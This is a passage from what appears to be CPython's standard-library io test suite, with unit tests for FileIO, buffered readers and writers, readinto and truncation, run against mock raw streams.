fileio = self.FileIO(f1.fileno(), closefd=False)
# .__init__() must not close f1
fileio.__init__(f2.fileno(), closefd=False)
f1.readline()
# .close() must not close f2
fileio.close()
f2.readline()
def test_nonbuffered_textio(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', buffering=0)
def test_invalid_newline(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', newline='invalid')
def test_buffered_readinto_mixin(self):
# Test the implementation provided by BufferedIOBase
class Stream(self.BufferedIOBase):
def read(self, size):
return b"12345"
read1 = read
stream = Stream()
for method in ("readinto", "readinto1"):
with self.subTest(method):
buffer = byteslike(5)
self.assertEqual(getattr(stream, method)(buffer), 5)
self.assertEqual(bytes(buffer), b"12345")
def test_fspath_support(self):
def check_path_succeeds(path):
with self.open(path, "w") as f:
f.write("egg\n")
with self.open(path, "r") as f:
self.assertEqual(f.read(), "egg\n")
check_path_succeeds(FakePath(support.TESTFN))
check_path_succeeds(FakePath(support.TESTFN.encode('utf-8')))
with self.open(support.TESTFN, "w") as f:
bad_path = FakePath(f.fileno())
with self.assertRaises(TypeError):
self.open(bad_path, 'w')
bad_path = FakePath(None)
with self.assertRaises(TypeError):
self.open(bad_path, 'w')
bad_path = FakePath(FloatingPointError)
with self.assertRaises(FloatingPointError):
self.open(bad_path, 'w')
# ensure that refcounting is correct with some error conditions
with self.assertRaisesRegex(ValueError, 'read/write/append mode'):
self.open(FakePath(support.TESTFN), 'rwxa')
def test_RawIOBase_readall(self):
# Exercise the default unlimited RawIOBase.read() and readall()
# implementations.
rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
self.assertEqual(rawio.read(), b"abcdefg")
rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
self.assertEqual(rawio.readall(), b"abcdefg")
def test_BufferedIOBase_readinto(self):
# Exercise the default BufferedIOBase.readinto() and readinto1()
# implementations (which call read() or read1() internally).
class Reader(self.BufferedIOBase):
def __init__(self, avail):
self.avail = avail
def read(self, size):
result = self.avail[:size]
self.avail = self.avail[size:]
return result
def read1(self, size):
"""Returns no more than 5 bytes at once"""
return self.read(min(size, 5))
tests = (
# (test method, total data available, read buffer size, expected
# read size)
("readinto", 10, 5, 5),
("readinto", 10, 6, 6), # More than read1() can return
("readinto", 5, 6, 5), # Buffer larger than total available
("readinto", 6, 7, 6),
("readinto", 10, 0, 0), # Empty buffer
("readinto1", 10, 5, 5), # Result limited to single read1() call
("readinto1", 10, 6, 5), # Buffer larger than read1() can return
("readinto1", 5, 6, 5), # Buffer larger than total available
("readinto1", 6, 7, 5),
("readinto1", 10, 0, 0), # Empty buffer
)
UNUSED_BYTE = 0x81
for test in tests:
with self.subTest(test):
method, avail, request, result = test
reader = Reader(bytes(range(avail)))
buffer = bytearray((UNUSED_BYTE,) * request)
method = getattr(reader, method)
self.assertEqual(method(buffer), result)
self.assertEqual(len(buffer), request)
self.assertSequenceEqual(buffer[:result], range(result))
unused = (UNUSED_BYTE,) * (request - result)
self.assertSequenceEqual(buffer[result:], unused)
self.assertEqual(len(reader.avail), avail - result)
class CIOTest(IOTest):
def test_IOBase_finalize(self):
# Issue #12149: segmentation fault on _PyIOBase_finalize when both a
# class which inherits IOBase and an object of this class are caught
# in a reference cycle and close() is already in the method cache.
class MyIO(self.IOBase):
def close(self):
pass
# create an instance to populate the method cache
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertIsNone(wr(), wr)
class PyIOTest(IOTest):
pass
@support.cpython_only
class APIMismatchTest(unittest.TestCase):
def test_RawIOBase_io_in_pyio_match(self):
"""Test that pyio RawIOBase class has all c RawIOBase methods"""
mismatch = support.detect_api_mismatch(pyio.RawIOBase, io.RawIOBase,
ignore=('__weakref__',))
self.assertEqual(mismatch, set(), msg='Python RawIOBase does not have all C RawIOBase methods')
def test_RawIOBase_pyio_in_io_match(self):
"""Test that c RawIOBase class has all pyio RawIOBase methods"""
mismatch = support.detect_api_mismatch(io.RawIOBase, pyio.RawIOBase)
self.assertEqual(mismatch, set(), msg='C RawIOBase does not have all Python RawIOBase methods')
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
repr(buf) # Should still work
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 9)
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
del bufio
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.tp(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception OSError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = "%s.%s" % (self.tp.__module__, self.tp.__qualname__)
self.assertEqual(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertEqual(repr(b), "<%s name='dummy'>" % clsname)
raw.name = b"dummy"
self.assertEqual(repr(b), "<%s name=b'dummy'>" % clsname)
def test_recursive_repr(self):
# Issue #25455
raw = self.MockRawIO()
b = self.tp(raw)
with support.swap_attr(raw, 'name', b):
try:
repr(b) # Should not crash
except RuntimeError:
pass
def test_flush_error_on_close(self):
# Test that buffered file is closed despite failed flush
# and that flush() is called before file closed.
raw = self.MockRawIO()
closed = []
def bad_flush():
closed[:] = [b.closed, raw.closed]
raise OSError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
self.assertTrue(raw.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
raw.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
b.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(b.closed)
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
raw = self.MockRawIO()
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
b.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(b.closed)
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises(AttributeError):
buf.raw = x
class SizeofTest:
@support.cpython_only
def test_sizeof(self):
bufsize1 = 4096
bufsize2 = 8192
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize1)
size = sys.getsizeof(bufio) - bufsize1
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize2)
self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
@support.cpython_only
def test_buffer_freeing(self) :
bufsize = 4096
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize)
size = sys.getsizeof(bufio) - bufsize
bufio.close()
self.assertEqual(sys.getsizeof(bufio), size)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEqual(b"abc", bufio.read())
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.read, 0)
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.read(0), b'')
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(arg))
# Invalid args
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"b", bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"", bufio.read1(0))
self.assertEqual(b"c", bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"d", bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b"efg", bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1(100))
self.assertEqual(rawio._reads, 4)
def test_read1_arbitrary(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"bc", bufio.read1())
self.assertEqual(b"d", bufio.read1())
self.assertEqual(b"efg", bufio.read1(-1))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1())
self.assertEqual(rawio._reads, 4)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"cd")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ef")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"gf")
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b"gf")
rawio = self.MockRawIO((b"abc", None))
bufio = self.tp(rawio)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"cb")
def test_readinto1(self):
buffer_size = 10
rawio = self.MockRawIO((b"abc", b"de", b"fgh", b"jkl"))
bufio = self.tp(rawio, buffer_size=buffer_size)
b = bytearray(2)
self.assertEqual(bufio.peek(3), b'abc')
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 1)
self.assertEqual(b[:1], b"c")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"de")
self.assertEqual(rawio._reads, 2)
b = bytearray(2*buffer_size)
self.assertEqual(bufio.peek(3), b'fgh')
self.assertEqual(rawio._reads, 3)
self.assertEqual(bufio.readinto1(b), 6)
self.assertEqual(b[:6], b"fghjkl")
self.assertEqual(rawio._reads, 4)
def test_readinto_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readinto1_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto1(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent
self.assertEqual(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b"abcd", bufio.read(6))
self.assertEqual(b"e", bufio.read(1))
self.assertEqual(b"fg", bufio.read())
self.assertEqual(b"", bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b"", bufio.read())
rawio = self.MockRawIO((b"a", None, None))
self.assertEqual(b"a", rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read())
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(support.TESTFN, "wb") as f:
f.write(s)
with self.open(support.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
support.unlink(support.TESTFN)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
bufio.read(1)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
self.assertRaises(self.UnsupportedOperation, bufio.tell)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
def test_no_extraneous_read(self):
# Issue #9550; when the raw IO object has satisfied the read request,
# we should not issue any additional reads, otherwise it may block
# (e.g. socket).
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b"x" * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
# Simple case: one raw read is enough to satisfy the request.
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
# A more complex case where two raw reads are needed to satisfy
# the request.
rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
def test_read_on_closed(self):
# Issue #23796
b = io.BufferedReader(io.BytesIO(b"12"))
b.read(1)
b.close()
self.assertRaises(ValueError, b.peek)
self.assertRaises(ValueError, b.read1, 1)
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
tp = io.BufferedReader
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
# _pyio.BufferedReader seems to implement reading different, so that
# checking this is not so easy.
self.assertRaises(OSError, bufio.read, 10)
def test_garbage_collection(self):
# C BufferedReader objects are collected.
# The Python version has __del__, so it ends into gc.garbage instead
self.addCleanup(support.unlink, support.TESTFN)
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedReader"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.write, b'')
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.write(b''), 0)
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
buffer = bytearray(b"def")
bufio.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
bufio.flush()
self.assertEqual(b"".join(writer._write_stack), b"abcdef")
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents, b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_writelines(self):
l = [b'ab', b'cd', b'ef']
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_userlist(self):
l = UserList([b'ab', b'cd', b'ef'])
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_error(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
self.assertRaises(TypeError, bufio.writelines, None)
self.assertRaises(TypeError, bufio.writelines, 'abc')
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEqual(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
self.addCleanup(support.unlink, support.TESTFN)
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
def test_truncate_after_write(self):
# Ensure that truncate preserves the file position after
# writes longer than the buffer size.
# Issue: https://bugs.python.org/issue32228
self.addCleanup(support.unlink, support.TESTFN)
with self.open(support.TESTFN, "wb") as f:
# Fill with some buffer
f.write(b'\x00' * 10000)
buffer_sizes = [8192, 4096, 200]
for buffer_size in buffer_sizes:
with self.open(support.TESTFN, "r+b", buffering=buffer_size) as f:
f.write(b'\x00' * (buffer_size + 1))
# After write write_pos and write_end are set to 0
f.read(1)
# read operation makes sure that pos != raw_pos
f.truncate()
self.assertEqual(f.tell(), buffer_size + 2)
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(support.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
self.assertRaises(OSError, bufio.write, b"abcdef")
def test_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), 8, 12)
def test_write_error_on_close(self):
raw = self.MockRawIO()
def bad_write(b):
raise OSError()
raw.write = bad_write
b = self.tp(raw)
b.write(b'spam')
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
def test_slow_close_from_thread(self):
# Issue #31976
rawio = self.SlowFlushRawIO()
bufio = self.tp(rawio, 8)
t = threading.Thread(target=bufio.close)
t.start()
rawio.in_flush.wait()
self.assertRaises(ValueError, bufio.write, b'spam')
self.assertTrue(bufio.closed)
t.join()
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
tp = io.BufferedWriter
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends into gc.garbage instead
self.addCleanup(support.unlink, support.TESTFN)
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedWriter"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_uninitialized(self):
pair = self.tp.__new__(self.tp)
del pair
pair = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.read, 0)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.write, b'')
pair.__init__(self.MockRawIO(), self.MockRawIO())
self.assertEqual(pair.read(0), b'')
self.assertEqual(pair.write(b''), 0)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
